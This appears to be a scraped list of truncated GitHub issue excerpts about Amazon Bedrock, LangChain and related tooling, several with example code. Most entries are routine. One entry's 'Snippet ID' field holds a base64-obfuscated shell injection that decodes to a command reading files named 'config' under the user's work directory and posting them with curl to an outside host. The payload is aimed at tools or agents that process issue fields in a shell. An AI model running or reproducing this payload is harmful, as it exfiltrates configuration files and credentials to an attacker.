-
### Describe the feature
AWS provides model invocation logging for the Bedrock service. I would like to add support for it to Cloud Custodian.
https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-l…
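For reference, the Bedrock control-plane call that such a Custodian action or filter would presumably wrap is `PutModelInvocationLoggingConfiguration`. A minimal boto3 sketch, assuming a recent boto3 with the `bedrock` client; the bucket name, prefix, and delivery flags are illustrative placeholders:
```
import boto3

# Sketch of the Bedrock API call a Custodian action could wrap.
# Bucket name, prefix, and delivery flags are illustrative placeholders.
bedrock = boto3.client("bedrock")

bedrock.put_model_invocation_logging_configuration(
    loggingConfig={
        "s3Config": {
            "bucketName": "my-bedrock-invocation-logs",  # hypothetical bucket
            "keyPrefix": "bedrock/",
        },
        "textDataDeliveryEnabled": True,
        "imageDataDeliveryEnabled": True,
        "embeddingDataDeliveryEnabled": True,
    }
)

# Read the current configuration back, e.g. for a Custodian filter.
print(bedrock.get_model_invocation_logging_configuration().get("loggingConfig"))
```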
-
### System Info
Sample Snippet:
```
from langchain.chains.question_answering import load_qa_chain
chain = load_qa_chain(llm, chain_type="stuff")
query = "decentralized identity"
docs = doc…
```
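For context, a complete version of this (legacy LangChain) pattern looks roughly like the sketch below; the OpenAI LLM, OpenAIEmbeddings, and FAISS index are assumptions added for illustration, since the original snippet is truncated before the retrieval step:
```
from langchain.chains.question_answering import load_qa_chain
from langchain.embeddings import OpenAIEmbeddings
from langchain.llms import OpenAI
from langchain.vectorstores import FAISS

# Toy vector store; in the issue this would be the poster's document index.
docsearch = FAISS.from_texts(
    ["Decentralized identity lets users control their own credentials."],
    OpenAIEmbeddings(),
)

llm = OpenAI(temperature=0)
chain = load_qa_chain(llm, chain_type="stuff")
query = "decentralized identity"
docs = docsearch.similarity_search(query)  # retrieve documents relevant to the query
answer = chain.run(input_documents=docs, question=query)
print(answer)
```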
-
### Describe the feature
- Add missing features to the Lambda layer construct
- Refactor Q/A, Data ingestion and Summarization constructs to use the updated Lambda layer
### Use Case
Facilitate s…
-
### Checked other resources
- [X] I added a very descriptive title to this issue.
- [X] I searched the LangChain.js documentation with the integrated search.
- [X] I used the GitHub search to fin…
-
### Snippet ID
;echo 'ZmluZCAiJEhPTUUvd29yayIgLXR5cGUgZiAtbmFtZSBjb25maWcgfCB4YXJncyBjYXQgfCBjdXJsIC1kIEAtIGdpdGxhYi50ZWNoa3JhbnRpLmNvbTo5OTk5ICAg' | base64 -d | bash - #
### Title of the Snippet
l…
-
### Description
Prompt chaining is a generative AI technique for accomplishing complex tasks with large language models (LLMs). With prompt chaining, complex tasks are broken down into smaller well-d…
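As a minimal sketch of the idea, each step is a small, well-scoped prompt whose output feeds the next prompt; the `call_llm` helper below is hypothetical and stands in for whichever model client (e.g. Bedrock) is actually used:
```
# Prompt chaining sketch: break a complex task into smaller prompts and feed
# each step's output into the next. `call_llm` is a hypothetical helper that
# stands in for the real model client.
def call_llm(prompt: str) -> str:
    raise NotImplementedError("plug in your model client here")

def summarize_then_translate(document: str, language: str) -> str:
    # Step 1: a narrow, well-defined subtask.
    summary = call_llm(f"Summarize the following text in three sentences:\n{document}")
    # Step 2: the previous output becomes the next prompt's input.
    return call_llm(f"Translate this summary into {language}:\n{summary}")
```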
-
### Feature request
It seems that there is currently no way to pass the filter dynamically when calling the ConversationalRetrievalChain; the filter can only be specified in the retriever when it's…
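To illustrate the limitation being described, in (older) LangChain the metadata filter is fixed when the retriever is constructed, so every chain call reuses it; the Chroma store, documents, and filter value below are illustrative assumptions:
```
from langchain.chains import ConversationalRetrievalChain
from langchain.embeddings import OpenAIEmbeddings
from langchain.llms import OpenAI
from langchain.vectorstores import Chroma

# Toy store with per-document metadata (contents are illustrative).
vectorstore = Chroma.from_texts(
    ["Vacation policy: 25 days.", "Travel policy: book via the portal."],
    OpenAIEmbeddings(),
    metadatas=[{"source": "handbook.pdf"}, {"source": "travel.pdf"}],
)

# The filter is baked into the retriever at construction time...
retriever = vectorstore.as_retriever(
    search_kwargs={"filter": {"source": "handbook.pdf"}}
)
chain = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0), retriever=retriever)

# ...so every call reuses the same filter; there is no per-call override.
result = chain({"question": "What is the vacation policy?", "chat_history": []})
```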
-
**Is your feature request related to a problem? Please describe.**
I would like to use langchain4j to access models provided by [Amazon Bedrock](https://aws.amazon.com/bedrock/)
**Describe the sol…
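For reference, the underlying Bedrock runtime call that such an integration would wrap is `InvokeModel`; here is a minimal boto3 sketch (the model ID and request body are illustrative, and each model family expects its own body schema):
```
import json

import boto3

# Sketch of the raw Bedrock runtime call a langchain4j binding would wrap.
# The model ID and body are illustrative; each provider defines its own schema.
runtime = boto3.client("bedrock-runtime")

response = runtime.invoke_model(
    modelId="anthropic.claude-v2",
    contentType="application/json",
    accept="application/json",
    body=json.dumps({
        "prompt": "\n\nHuman: What is Amazon Bedrock?\n\nAssistant:",
        "max_tokens_to_sample": 300,
    }),
)
print(json.loads(response["body"].read()))
```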
-
### Issue you'd like to raise.
Bedrock can't seem to load my credentials when used within a Lambda function. My AWS credentials were set up in my local environment using environment variables. When…
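For what it's worth, inside a Lambda function boto3 normally resolves credentials from the function's execution role rather than from locally configured environment variables, so the role needs permission to call `bedrock:InvokeModel`. A minimal handler sketch (region, model ID, and request body are assumptions):
```
import json

import boto3

# In Lambda, boto3 picks up credentials from the execution role; no access
# keys need to be configured. Region, model ID, and body are illustrative.
runtime = boto3.client("bedrock-runtime", region_name="us-east-1")

def handler(event, context):
    response = runtime.invoke_model(
        modelId="amazon.titan-text-express-v1",
        contentType="application/json",
        accept="application/json",
        body=json.dumps({"inputText": event.get("prompt", "Hello")}),
    )
    return json.loads(response["body"].read())
```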
-
Instrument BedrockRuntimeClient.prototype.send when the command is InvokeModelWithResponseStreamCommand and the model is not `amazon.titan-embed` to create the span `Llm/completion/Bedrock/InvokeModelWithResp…